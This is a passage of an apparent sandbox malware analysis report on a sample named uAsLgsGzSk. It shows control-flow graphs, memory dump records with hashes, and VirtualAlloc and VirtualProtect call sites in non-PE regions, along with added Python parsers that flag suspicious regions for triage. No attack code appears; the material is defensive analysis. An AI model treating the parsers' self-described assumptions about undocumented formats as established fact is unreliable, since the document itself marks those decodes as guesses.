7ffd9ba2e1ef-7ffd9ba2e200 166->168 171 7ffd9ba2e202 168->171 172 7ffd9ba2e207-7ffd9ba2e2a7 168->172 171->172 206 7ffd9ba2e2ad-7ffd9ba2e30d 172->206 207 7ffd9ba2e4b3-7ffd9ba2e4bb 172->207 185 7ffd9ba2dbbe-7ffd9ba2dbe7 177->185 186 7ffd9ba2dbb9 177->186 182 7ffd9ba2db50-7ffd9ba2db8d 178->182 183 7ffd9ba2db4b 178->183 180->179 210 7ffd9ba2e5d0-7ffd9ba2e5e1 180->210 196 7ffd9ba2dbf2-7ffd9ba2dbf7 182->196 183->182 185->196 186->185 196->134 197->154 200 7ffd9ba2e121-7ffd9ba2e1b9 197->200 200->154 218 7ffd9ba2e30f 206->218 219 7ffd9ba2e314-7ffd9ba2e31d 206->219 207->166 213 7ffd9ba2e5e3 210->213 214 7ffd9ba2e5e8-7ffd9ba2e695 210->214 213->214 214->179 218->219 221 7ffd9ba2e323-7ffd9ba2e37b 219->221 222 7ffd9ba2e48c-7ffd9ba2e49a 219->222 232 7ffd9ba2e381-7ffd9ba2e3ad 221->232 233 7ffd9ba2e407-7ffd9ba2e435 221->233 225 7ffd9ba2e4a1-7ffd9ba2e4a9 222->225 226 7ffd9ba2e49c 222->226 227 7ffd9ba2e4ab-7ffd9ba2e4b0 225->227 226->225 227->207 236 7ffd9ba2e3af 232->236 237 7ffd9ba2e3b4-7ffd9ba2e402 232->237 234 7ffd9ba2e437 233->234 235 7ffd9ba2e43c-7ffd9ba2e48a 233->235 234->235 235->227 236->237 237->227
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d98b0bb54cabcc76f10b08c584a1e87e5f4f8b131f1b35175ace9b79dcdb164
                                                                                                  • Instruction ID: 1f9ee8072fcfa11aad20f62902c0b0272b6f007602f1dda02925ae78591ee211
                                                                                                  • Opcode Fuzzy Hash: 7d98b0bb54cabcc76f10b08c584a1e87e5f4f8b131f1b35175ace9b79dcdb164
                                                                                                  • Instruction Fuzzy Hash: BCB2F070A4991D8FDBA8EF58C8A5BA9B7B1FF58300F1441E9D04DD3296CA75AE81CF40
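The Execution Graph and Control-flow Graph entries in this section are each one flattened token list: a node is a decimal id followed by its address (a single address or a start-end range) and optional annotations such as an API name or "call <target>", and an edge is written a->b. The following added example (not Joe Sandbox code; the format description is inferred from the report text, and node ids are assumed never to collide with addresses, which on this page always contain a-f) parses those lists and pulls out what a triager wants from them: the entry blocks, the blocks annotated with VirtualAlloc or VirtualProtect, intra-module call targets, and loop back edges found by a depth-first search. Its inputs are the execution_graph line above, copied verbatim, and a constructed subset of the first control_flow_graph above, re-serialised in the same format.

```python
"""Parse the flattened execution_graph / control_flow_graph lines of a Joe Sandbox
disassembly section. Added example, not Joe Sandbox code; the format is inferred from
the report: a decimal token opens a node and is followed by its address (hex or a hex
range start-end), later tokens annotate it (API name, or "call <hex>"), a->b is an edge."""
import re
from dataclasses import dataclass, field
from typing import Optional

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")


@dataclass
class Node:
    start: int             # first address of the block
    end: Optional[int]     # last address, None for a single-address node
    labels: list = field(default_factory=list)

    @property
    def apis(self):        # API names: labels that are neither 'call' nor a hex target
        return [t for t in self.labels if t != "call" and not HEX_RE.match(t)]

    @property
    def calls(self):       # hex targets that follow a 'call' label
        return [int(t, 16) for i, t in enumerate(self.labels) if i and self.labels[i - 1] == "call"]


@dataclass
class Graph:
    kind: str
    nodes: dict = field(default_factory=dict)   # id -> Node
    edges: list = field(default_factory=list)   # (src id, dst id) in report order


def parse_graph(text: str) -> Graph:
    tokens = text.split()
    if not tokens or tokens[0] not in ("execution_graph", "control_flow_graph"):
        raise ValueError("expected an execution_graph or control_flow_graph line")
    g, pending, cur = Graph(tokens[0]), None, None   # pending: node id awaiting its address
    for tok in tokens[1:]:
        m = EDGE_RE.match(tok)
        if m:                                        # edge a->b
            g.edges.append((int(m.group(1)), int(m.group(2))))
            cur = None
        elif pending is not None:                    # address or start-end range of the new node
            start, _, end = tok.partition("-")
            if not HEX_RE.match(start) or (end and not HEX_RE.match(end)):
                raise ValueError(f"bad address {tok!r} for node {pending}")
            cur = g.nodes[pending] = Node(int(start, 16), int(end, 16) if end else None)
            pending = None
        elif tok.isdigit():                          # new node id (assumption: addresses are never all-decimal)
            pending, cur = int(tok), None
        elif cur is not None:                        # annotation of the current node
            cur.labels.append(tok)
        else:
            raise ValueError(f"unexpected token {tok!r}")
    if pending is not None or {n for e in g.edges for n in e} - set(g.nodes):
        raise ValueError("malformed graph: dangling node id or edge to an undeclared node")
    return g


def entry_nodes(g: Graph) -> list:
    """Nodes without incoming edges: function entries or orphaned blocks."""
    return sorted(set(g.nodes) - {b for _, b in g.edges})


def back_edges(g: Graph) -> list:
    """Edges that close a cycle in a DFS from the entries, i.e. loop back edges."""
    succ = {n: [] for n in g.nodes}
    for a, b in g.edges:
        succ[a].append(b)
    state, found = {}, []          # state: 1 = on the DFS stack, 2 = finished

    def visit(n):
        state[n] = 1
        for m in succ[n]:
            if state.get(m) == 1:
                found.append((n, m))
            elif m not in state:
                visit(m)
        state[n] = 2

    for n in entry_nodes(g) + sorted(g.nodes):
        if n not in state:
            visit(n)
    return found


def api_sites(g: Graph) -> dict:
    """API name -> ids of the blocks annotated with it."""
    sites = {}
    for nid, node in g.nodes.items():
        for api in node.apis:
            sites.setdefault(api, []).append(nid)
    return {k: sorted(v) for k, v in sites.items()}


# EXEC_GRAPH is the execution_graph line of the report; CFG_SAMPLE is a constructed subset of the
# first control_flow_graph above (the loop 89 -> 91 -> 95 -> 111 -> 142 -> 89 and the call node 51).
EXEC_GRAPH = ("execution_graph 14710 7ffd9ba221ce 14711 7ffd9ba221dd VirtualProtect 14710->14711 14713 "
              "7ffd9ba2231d 14711->14713 14714 7ffd9ba23bbd 14715 7ffd9ba23bdf VirtualAlloc 14714->14715 "
              "14717 7ffd9ba23cf5 14715->14717")
CFG_SAMPLE = ("control_flow_graph 51 7ffd9ba2d47d-7ffd9ba2d559 call 7ffd9ba2e6a6 71 7ffd9ba2d666-7ffd9ba2d6be "
              "51->71 78 7ffd9ba2d6c4-7ffd9ba2d70f 71->78 89 7ffd9ba2d83c-7ffd9ba2d849 78->89 90 "
              "7ffd9ba2d84f-7ffd9ba2d850 89->90 91 7ffd9ba2d714-7ffd9ba2d722 89->91 94 7ffd9ba2d724 91->94 "
              "95 7ffd9ba2d729-7ffd9ba2d7a9 91->95 94->95 111 7ffd9ba2d7b0-7ffd9ba2d82a 95->111 112 "
              "7ffd9ba2d7ab 95->112 112->111 142 7ffd9ba2d834-7ffd9ba2d839 111->142 143 "
              "7ffd9ba2d82c-7ffd9ba2d831 111->143 142->89 143->142")
```

Parsing EXEC_GRAPH yields six nodes, which matches the "Total number of Nodes: 6" line of the Execution Graph, two entry blocks (14710 and 14714, one chain ending in VirtualProtect and one in VirtualAlloc) and no loops; on CFG_SAMPLE the search reports the single back edge 142->89, which is the loop body to inspect when deciding whether a block that allocates or re-protects memory is executed once or repeatedly. The page's full control-flow lines parse the same way, since they only add more nodes and edges in the same format.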

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 388 7ffd9ba59a40 389 7ffd9ba59a45-7ffd9ba59a8e 388->389 390 7ffd9ba59a90-7ffd9ba59a95 389->390 391 7ffd9ba59a98-7ffd9ba59aa1 389->391 390->391 392 7ffd9ba59f2f-7ffd9ba59f35 391->392 393 7ffd9ba59f3b-7ffd9ba59f54 392->393 394 7ffd9ba59aa6-7ffd9ba59ad0 392->394 395 7ffd9ba59ad2 394->395 396 7ffd9ba59ad7-7ffd9ba59af0 394->396 395->396 398 7ffd9ba59af2 396->398 399 7ffd9ba59af7-7ffd9ba59b11 396->399 398->399 400 7ffd9ba59b13 399->400 401 7ffd9ba59b18-7ffd9ba59b30 399->401 400->401 402 7ffd9ba59b32 401->402 403 7ffd9ba59b37-7ffd9ba59b58 401->403 402->403 404 7ffd9ba59b5a-7ffd9ba59b5e 403->404 405 7ffd9ba59bc6-7ffd9ba59be3 403->405 404->405 408 7ffd9ba59b60-7ffd9ba59b74 404->408 406 7ffd9ba59bea-7ffd9ba59c03 405->406 407 7ffd9ba59be5 405->407 409 7ffd9ba59c0a-7ffd9ba59c24 406->409 410 7ffd9ba59c05 406->410 407->406 411 7ffd9ba59bb8-7ffd9ba59bbe 408->411 414 7ffd9ba59c2b-7ffd9ba59c43 409->414 415 7ffd9ba59c26 409->415 410->409 412 7ffd9ba59bc0-7ffd9ba59bc1 411->412 413 7ffd9ba59b76-7ffd9ba59b7a 411->413 416 7ffd9ba59c57-7ffd9ba59c8e 412->416 417 7ffd9ba59b7c-7ffd9ba59b82 413->417 418 7ffd9ba59b85-7ffd9ba59b9b 413->418 419 7ffd9ba59c4a-7ffd9ba59c54 414->419 420 7ffd9ba59c45 414->420 415->414 423 7ffd9ba59c90-7ffd9ba59c95 416->423 424 7ffd9ba59c98-7ffd9ba59cc1 416->424 417->418 421 7ffd9ba59ba2-7ffd9ba59bb5 418->421 422 7ffd9ba59b9d 418->422 419->416 420->419 421->411 422->421 423->424 425 7ffd9ba59cc3-7ffd9ba59cc8 424->425 426 7ffd9ba59ccb-7ffd9ba59df1 424->426 425->426 427 7ffd9ba59df3-7ffd9ba59e0c 426->427 428 7ffd9ba59e4a-7ffd9ba59e4e 426->428 429 7ffd9ba59e0e-7ffd9ba59e12 427->429 430 7ffd9ba59e7f-7ffd9ba59e96 427->430 431 7ffd9ba59e50 428->431 432 7ffd9ba59e55-7ffd9ba59e6e 428->432 429->430 435 7ffd9ba59e14-7ffd9ba59e23 429->435 433 7ffd9ba59e9d-7ffd9ba59eb7 430->433 434 7ffd9ba59e98 430->434 431->432 436 7ffd9ba59e71-7ffd9ba59e77 432->436 437 7ffd9ba59ebe-7ffd9ba59ee2 433->437 438 7ffd9ba59eb9 433->438 434->433 435->436 439 7ffd9ba59e79-7ffd9ba59e7a 436->439 440 7ffd9ba59e25-7ffd9ba59e29 436->440 441 7ffd9ba59ee4 437->441 442 7ffd9ba59ee9-7ffd9ba59f0d 437->442 438->437 445 7ffd9ba59f27-7ffd9ba59f2c 439->445 443 7ffd9ba59e3d-7ffd9ba59e44 440->443 444 7ffd9ba59e2b-7ffd9ba59e3a 440->444 441->442 446 7ffd9ba59f14-7ffd9ba59f25 442->446 447 7ffd9ba59f0f 442->447 443->428 444->443 445->392 446->445 447->446
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a44fe80754948753998d36280298a46c94cd70cf8b1873dad56534774a4d7cd5
                                                                                                  • Instruction ID: be08885d8bb4a79dcf86a967e7a279fe2efd8d989aa0d101a01042dcf23aaec0
                                                                                                  • Opcode Fuzzy Hash: a44fe80754948753998d36280298a46c94cd70cf8b1873dad56534774a4d7cd5
                                                                                                  • Instruction Fuzzy Hash: DD120470E0421D8FDB18DFE8C495AEDBBF2FF48300F148569D41AEB259DA74AA85CB50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 532 7ffd9ba10d70-7ffd9ba10d87 533 7ffd9ba10d89 532->533 534 7ffd9ba10d8a-7ffd9ba10dc9 532->534 533->534 536 7ffd9ba10dd0-7ffd9ba10e39 call 7ffd9ba107f8 534->536 537 7ffd9ba10dcb 534->537 546 7ffd9ba10e70-7ffd9ba10ebb 536->546 547 7ffd9ba10e3b-7ffd9ba10e6d 536->547 537->536 554 7ffd9ba10ebd-7ffd9ba10ed2 546->554 555 7ffd9ba10ed3-7ffd9ba10fb3 546->555 547->546 554->555 567 7ffd9ba10fbb-7ffd9ba110ac 555->567
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba10000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 495f97ee652bc317c079657ed2911e0117d417c9732689de1c2f1e32c00264e2
                                                                                                  • Instruction ID: 4f3b625f9e77ec66fb297233ee2a3ee790a237253a7831333e642075be9dc5ff
                                                                                                  • Opcode Fuzzy Hash: 495f97ee652bc317c079657ed2911e0117d417c9732689de1c2f1e32c00264e2
                                                                                                  • Instruction Fuzzy Hash: D8A15BB1A1EA9D8EE798DB6CC8657AD7FE1EF59310F0401BED04AD72D6CA752801C740

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA16000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA16000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba16000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: bdcdfc0c80a75c3ca64641de7ed6b1c099e16addb301bcbfdfe41cc8d6da7241
                                                                                                  • Instruction ID: 0c51bc7732fbeff26c47760fd221c6510f8781d73380b4830906a78a45ae84c2
                                                                                                  • Opcode Fuzzy Hash: bdcdfc0c80a75c3ca64641de7ed6b1c099e16addb301bcbfdfe41cc8d6da7241
                                                                                                  • Instruction Fuzzy Hash: 6F518D70D0974D8FDB54DFA8C885AEDBBF0FB6A300F1042AAD449E3255DB74A885CB80

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 13 7ffd9ba23bbd-7ffd9ba23cf3 VirtualAlloc 18 7ffd9ba23cf5 13->18 19 7ffd9ba23cfb-7ffd9ba23d5f 13->19 18->19
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA16000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA16000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba16000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 04334b865bcade119506b8c18ccbf3942e995c234a713e6bf58307cde0311a0b
                                                                                                  • Instruction ID: ebab0df94e77fc39c41d71e5df42a9d147204d78cbb29e1d7ba7372027bba743
                                                                                                  • Opcode Fuzzy Hash: 04334b865bcade119506b8c18ccbf3942e995c234a713e6bf58307cde0311a0b
                                                                                                  • Instruction Fuzzy Hash: 3E513A70908A5C8FDF94EF68C845BE9BBF1FB69310F1081AAD04DE3255CB71A9858B80
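Every record in this section repeats the same three facts: the memory region the code was dumped from (Source File, Offset, based on PE), the process the snapshot came from (Snapshot File), and the APIs the IDA plugin resolved in that function (API ID). The following added example (not Joe Sandbox code) folds the records of a section into one row per process and region, so that a region with no PE header that nevertheless contains VirtualAlloc and VirtualProtect call sites, which is the shape of the uAsLgsGzSk region at 7ffd9ba16000 in the two records above, is listed directly. The .sdmp naming scheme is not documented on the page: the example reads field 1 as the process index and field 4 as the base because both can be cross-checked against the snapshot file name and the Offset on the same line (26 = 0x1A and 35 = 0x23 in the records here), and it reads fields 5 and 7 as page protection and memory type purely because their values match PAGE_EXECUTE_READWRITE (0x40) and MEM_PRIVATE (0x20000); treat those two decodes as an assumption. API IDs are kept exactly as the report spells them (ProtectVirtual, AllocVirtual), and the sample text is three records copied from this section.

```python
"""Fold the 'Memory Dump Source' records of a Joe Sandbox disassembly section into one
view per process and dumped region, so that non-PE regions with VirtualAlloc / VirtualProtect
call sites stand out. Added example, not Joe Sandbox code. Assumed, undocumented .sdmp
layout '<f1>.<f2>.<f3>.<f4>.<f5>.<f6>.<f7>.<f8>.sdmp': f1 = process index (hex), f4 = region
base (both checkable against the snapshot file name and the Offset); f5 and f7 are read as
page protection and memory type only because their values equal PAGE_EXECUTE_READWRITE
(0x40) and MEM_PRIVATE (0x20000). API IDs are kept as the report spells them."""
import re
from dataclasses import dataclass, field

SOURCE_RE = re.compile(r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")
SNAPSHOT_RE = re.compile(r"Snapshot File:\s*hcaresult_(?P<idx>\d+)_\d+_(?P<base>[0-9a-f]+)_(?P<image>.+?)\.jbxd")
API_RE = re.compile(r"API ID:[ \t]*(?P<apis>\S.*)?$", re.M)   # [ \t]* so an empty ID never swallows the next line
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class DumpRecord:
    image: str            # process image name, taken from the snapshot file name
    proc_index: int
    base: int
    pe: bool              # 'based on PE' flag of the dump
    protect: str          # decoded f5 (assumption, see module docstring)
    mem_type: str         # decoded f7 (assumption, see module docstring)
    apis: list = field(default_factory=list)
    consistent: bool = True   # sdmp fields agree with the snapshot name and the Offset


def parse_records(section: str) -> list:
    records = []
    for chunk in section.split("Memory Dump Source")[1:]:
        src, snap = SOURCE_RE.search(chunk), SNAPSHOT_RE.search(chunk)
        if not (src and snap):
            continue                                  # truncated record, skip it
        f = src["name"].split(".")
        proc_index, base = int(f[0], 16), int(f[3], 16)
        api = API_RE.search(chunk)                    # separator between several IDs is assumed to be $ or ,
        apis = [a.strip() for a in re.split(r"[$,]", api["apis"])] if api and api["apis"] else []
        records.append(DumpRecord(
            image=snap["image"], proc_index=proc_index, base=base, pe=src["pe"] == "true",
            protect=PAGE_PROTECT.get(int(f[4], 16), f"0x{int(f[4], 16):x}"),
            mem_type=MEM_TYPE.get(int(f[6], 16), f"0x{int(f[6], 16):x}"),
            apis=apis,
            consistent=(proc_index == int(snap["idx"]) and base == int(snap["base"], 16)
                        and base == int(src["offset"], 16))))
    return records


def group_regions(records: list) -> dict:
    """(image, process index, base) -> merged view of every dump of that region."""
    regions = {}
    for r in records:
        reg = regions.setdefault((r.image, r.proc_index, r.base),
                                 {"pe": r.pe, "protect": r.protect, "mem_type": r.mem_type,
                                  "apis": set(), "records": 0, "consistent": True})
        reg["apis"].update(r.apis)
        reg["records"] += 1
        reg["consistent"] = reg["consistent"] and r.consistent
    return regions


def suspicious_regions(regions: dict) -> list:
    """Non-PE regions with memory-management API call sites: the usual shape of
    unpacked or injected code that stages a further payload."""
    return sorted(k for k, v in regions.items() if not v["pe"] and v["apis"])


# Three records copied from the report section above (bullets included).
SAMPLE = """\
Memory Dump Source
• Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
Similarity
• API ID:
• String ID:
Memory Dump Source
• Source File: 00000023.00000002.3017140408.00007FFD9BA16000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA16000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7ffd9ba16000_uAsLgsGzSk.jbxd
Similarity
• API ID: ProtectVirtual
Memory Dump Source
• Source File: 00000023.00000002.3017140408.00007FFD9BA16000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA16000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7ffd9ba16000_uAsLgsGzSk.jbxd
Similarity
• API ID: AllocVirtual
"""
```

On SAMPLE, parse_records returns three consistent records; group_regions collapses them to two regions, and suspicious_regions returns only ("uAsLgsGzSk", 35, 0x7ffd9ba16000), the non-PE region whose two functions resolve to VirtualProtect and VirtualAlloc. The powershell region at 7ffd9ba20000 is kept but not flagged: no API was resolved in it, so on this evidence alone it is dynamically generated code of unknown purpose rather than a loader stage.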

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -
                                                                                                  • API String ID: 0-2547889144
                                                                                                  • Opcode ID: 974ea4011422f4116ae2bb0d4fc074aafd6595abf53421d61ced30fb13771895
                                                                                                  • Instruction ID: 35bf9bc234e66a0cf24edf75e1cdd2b099ba5afd4a1efe16d54f4aaab46f4b35
                                                                                                  • Opcode Fuzzy Hash: 974ea4011422f4116ae2bb0d4fc074aafd6595abf53421d61ced30fb13771895
                                                                                                  • Instruction Fuzzy Hash: D7215C70E4A51E8FDBB8DB58C854BF877B4EB18300F1100B9D50DA36A1DEB42AC09F40

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 242 7ffd9ba2696b-7ffd9ba26974 244 7ffd9ba2697f-7ffd9ba269be 242->244 246 7ffd9ba267fe-7ffd9ba26805 244->246 247 7ffd9ba269c4-7ffd9ba269ce 244->247 248 7ffd9ba26825-7ffd9ba26e5c 246->248 249 7ffd9ba26807-7ffd9ba26c2b 246->249 247->246 248->246 249->246 254 7ffd9ba26c31-7ffd9ba26c3b 249->254 254->246
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -
                                                                                                  • API String ID: 0-2547889144
                                                                                                  • Opcode ID: 41b9186abcca438b81178a92608d24544d3609f42b168350bf853d4576f439ca
                                                                                                  • Instruction ID: 99d4c08ba15629872c0d5cf27b230d71f9169ff68b8d2a2d5ee46daf0c4740a4
                                                                                                  • Opcode Fuzzy Hash: 41b9186abcca438b81178a92608d24544d3609f42b168350bf853d4576f439ca
                                                                                                  • Instruction Fuzzy Hash: 5301E970E4555E8FDBB5DB188855BE8B6B4EB58300F1141FAD01DD2291DAB42AC48F40

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e7d0ebd54b5a8d91333b3168cc1c6a525eb599334f7775f694a63bec31addc7a
                                                                                                  • Instruction ID: 65be86cbd4e996b436496ecff7f02f993eb5cce6600db5cb02fd6677844e34eb
                                                                                                  • Opcode Fuzzy Hash: e7d0ebd54b5a8d91333b3168cc1c6a525eb599334f7775f694a63bec31addc7a
                                                                                                  • Instruction Fuzzy Hash: F6F18F71E1965D8FDBA8DB98C8A17ACB7E1FF58300F0541B9D40DD3296DEB86A84CB40

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e02f6b447574086b2552dde732e73fd73ec8d46357c5b6ec4a57352ea4d1083
                                                                                                  • Instruction ID: 37475d5ceadd158c73c2114a0c0591fccb1e300cc519c7a990d93efaa33a6f2c
                                                                                                  • Opcode Fuzzy Hash: 2e02f6b447574086b2552dde732e73fd73ec8d46357c5b6ec4a57352ea4d1083
                                                                                                  • Instruction Fuzzy Hash: 6B715E71E19A4D8FDB98EF98C8A1BACB7A2FF54300F0541B9D00ED7296DE756984CB00

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 692 7ffd9ba28ab9-7ffd9ba28b04 694 7ffd9ba28b06 692->694 695 7ffd9ba28b0b-7ffd9ba28b11 692->695 694->695 696 7ffd9ba28be5-7ffd9ba28beb 695->696 697 7ffd9ba28bf1-7ffd9ba28bfa 696->697 698 7ffd9ba28b16-7ffd9ba28b4c 696->698 700 7ffd9ba28b52-7ffd9ba28bbf 698->700 705 7ffd9ba28bdd-7ffd9ba28be2 700->705 706 7ffd9ba28bc1-7ffd9ba28bca 700->706 705->696 706->705 707 7ffd9ba28bcc-7ffd9ba28bdc 706->707
Memory Dump Source
• Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0391782144bf13edf9e1f9fdba0d307acd1f81dc23973760149d4c20b98b03e7
• Instruction ID: cd727e46226d3f5d9f93432861723682e68eb1e487304b17cb7c30f814943e92
• Opcode Fuzzy Hash: 0391782144bf13edf9e1f9fdba0d307acd1f81dc23973760149d4c20b98b03e7
• Instruction Fuzzy Hash: 6E51A070A0964D9FCF84EF98D494AED7BF1FF59310F0A01AAE409E7261D674E990CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f5bc7b596093aa7bbed13fb893a29a874be364e55563b7a031a8dc27bb416450
                                                                                                  • Instruction ID: 0d4d404fe980e2b97c5733af37714910d342bd0ea03cc2af31e58f8e0de926e5
                                                                                                  • Opcode Fuzzy Hash: f5bc7b596093aa7bbed13fb893a29a874be364e55563b7a031a8dc27bb416450
                                                                                                  • Instruction Fuzzy Hash: 7F018B3190A78C8FCF54DF28C8555E93BE0FF28750F4502AAF848872A1D738EA54CB81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8b87b60ec480e4c7d529fa8fea16cc06fc4b6f9d856d767f149819151047c200
                                                                                                  • Instruction ID: 918a8f2503004db966a8203221f5b3eddf2b5be8912b3e6efe947706a50f3bdc
                                                                                                  • Opcode Fuzzy Hash: 8b87b60ec480e4c7d529fa8fea16cc06fc4b6f9d856d767f149819151047c200
                                                                                                  • Instruction Fuzzy Hash: 4A015E3090868D8FDB45EF68C869AD97FF0FF29304F0501ABE849C71A1D7749A54CB81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 073be99251e7dbbd6c836e334987c96df42bb119f2bc1db64012bca0175501d4
                                                                                                  • Instruction ID: 2e56ab2cbf47095e196fd40f1e330192ff7de8abc31cef12cd50f205435314f1
